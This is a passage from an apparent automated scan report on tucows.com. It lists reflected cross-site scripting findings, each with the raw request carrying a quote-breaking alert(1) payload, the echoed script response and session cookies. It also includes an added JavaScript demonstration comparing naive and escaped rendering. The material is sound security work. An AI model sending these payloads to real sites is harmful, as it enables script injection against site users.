Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/sitemap.html9edf7"-alert(1)-"26f2d744f54";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.153. http://www.tucows.com/sitemap.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /sitemap.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95630"-alert(1)-"ad45798eea4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitemap.html?95630"-alert(1)-"ad45798eea4=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:31:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 284587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/sitemap.html?95630"-alert(1)-"ad45798eea4=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.154. http://www.tucows.com/software.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /software.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6930b"-alert(1)-"88848db90c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /software.html6930b"-alert(1)-"88848db90c4 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/software.html6930b"-alert(1)-"88848db90c4";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...
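The following is an added example, not part of the report and not code from tucows.com. It reproduces the script-context reflection in finding 1.154 (the same pattern recurs in 1.155 through 1.161, and on the 404 page, so every path under the site reaches the same sink), contrasts the naive template with a hardened one, and shows why the raw payload has to be re-tested in the encoding a browser would actually send. The server-side template shape (url = "<request URL>";) is inferred from the recorded response; the PHP source is not shown in the report. The function names renderScriptVarNaive, renderScriptVarSafe, jsStringLiteral, runFragment and browserEncoded are introduced here.

```javascript
// Added example: script-context XSS from finding 1.154, naive vs. hardened rendering.
// The template shape below is assumed from the recorded response, not taken from source.

const PAYLOAD = '6930b"-alert(1)-"88848db90c4';          // payload recorded in finding 1.154
const REQUEST_URL = 'http://www.tucows.com/software.html' + PAYLOAD;

// Naive rendering (assumed server behaviour): request URL concatenated into a JS string literal.
function renderScriptVarNaive(requestUrl) {
  return 'url = "' + requestUrl + '";';
}

// Hardened rendering: emit a JSON string literal, then escape the characters that can still
// close the <script> element or break the line (<, >, U+2028, U+2029).
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}
function renderScriptVarSafe(requestUrl) {
  return 'url = ' + jsStringLiteral(requestUrl) + ';';
}

// Execute a rendered fragment the way the browser would, with alert() replaced by a stub
// that records its calls. Returns the value `url` ended up with and the recorded calls.
function runFragment(fragment) {
  const alertCalls = [];
  const alertStub = (arg) => { alertCalls.push(arg); };
  const fn = new Function('alert', 'var ' + fragment + '\nreturn url;');
  return { url: fn(alertStub), alertCalls };
}

// Browsers percent-encode a literal double quote in the request line; the recorded request
// was sent by a proxy tool with the raw character. This is what a browser would send.
function browserEncoded(url) {
  return encodeURI(url);
}

// Three cases: raw payload into the naive template (breaks out, alert runs), browser-encoded
// payload into the naive template (no break-out unless the server decodes first), and the
// raw payload into the hardened template (stays a string).
function demo() {
  return {
    naiveRaw:     runFragment(renderScriptVarNaive(REQUEST_URL)),
    naiveBrowser: runFragment(renderScriptVarNaive(browserEncoded(REQUEST_URL))),
    safeRaw:      runFragment(renderScriptVarSafe(REQUEST_URL)),
  };
}
```

runFragment evaluates the rendered fragment with new Function, which is acceptable only because the input is the constructed payload above; do not point it at live responses. The percent-encoded case is the check a practitioner wants before calling this exploitable from a link: a browser sends %22 for the double quote, so the break-out only works from a crafted URL if the server decodes the request URI before echoing it, and the recorded proxy-sent request does not establish that.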

1.155. http://www.tucows.com/software.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /software.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89730"-alert(1)-"ede5d633695 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /software.html?89730"-alert(1)-"ede5d633695=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:49 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 49601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download Windows Fre
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 2;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/software.html?89730"-alert(1)-"ede5d633695=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.156. http://www.tucows.com/software.html [pf parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /software.html

Issue detail

The value of the pf request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36557"-alert(1)-"b121e4a791 was submitted in the pf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /software.html?t=689&pf=win36557"-alert(1)-"b121e4a791 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:00 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 55803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download Windows Fre
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 2;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/software.html?t=689&pf=win36557"-alert(1)-"b121e4a791";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.157. http://www.tucows.com/software.html [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /software.html

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d91d8"-alert(1)-"32c743300b4 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /software.html?t=689d91d8"-alert(1)-"32c743300b4&pf=win HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVDWt9eDsgAvDivKt0Eex6B0RPBHeE1vxYfjLZMpBZlW7bjlV79Z3QWdkzy6r7qpr%2BTJUX7x9ThxdXpMo6KMFZWyrMA2IUCivRn8fEr2dY2En; path=/
Connection: close
Content-Type: text/html
Content-Length: 55720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download Windows Fre
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 2;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/software.html?t=689d91d8"-alert(1)-"32c743300b4&pf=win";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.158. http://www.tucows.com/terms.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /terms.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc4ae"-alert(1)-"f753e1f604a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /terms.htmlfc4ae"-alert(1)-"f753e1f604a HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/terms.htmlfc4ae"-alert(1)-"f753e1f604a";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.159. http://www.tucows.com/terms.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /terms.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ed39"-alert(1)-"d3cf4b9dbed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /terms.html?2ed39"-alert(1)-"d3cf4b9dbed=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 38731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/terms.html?2ed39"-alert(1)-"d3cf4b9dbed=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.160. http://www.tucows.com/videoegg/ad.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /videoegg/ad.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 436cb"-alert(1)-"c0ec75e5035 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /videoegg436cb"-alert(1)-"c0ec75e5035/ad.html HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www8.tucows.com/delivery/afr.php?zoneid=187&cb=6253c4ae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmc=163973946; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utmb=163973946; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/videoegg436cb"-alert(1)-"c0ec75e5035/ad.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.161. http://www.tucows.com/videoegg/ad.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /videoegg/ad.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97844"-alert(1)-"e3ce1315cea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /videoegg/ad.html97844"-alert(1)-"e3ce1315cea HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www8.tucows.com/delivery/afr.php?zoneid=187&cb=6253c4ae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmc=163973946; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utmb=163973946; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/videoegg/ad.html97844"-alert(1)-"e3ce1315cea";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

2. Cleartext submission of password
There are 62 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


2.1. http://www.tucows.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
javascript:void(null);
The form contains the following password fields:
pw
pwc
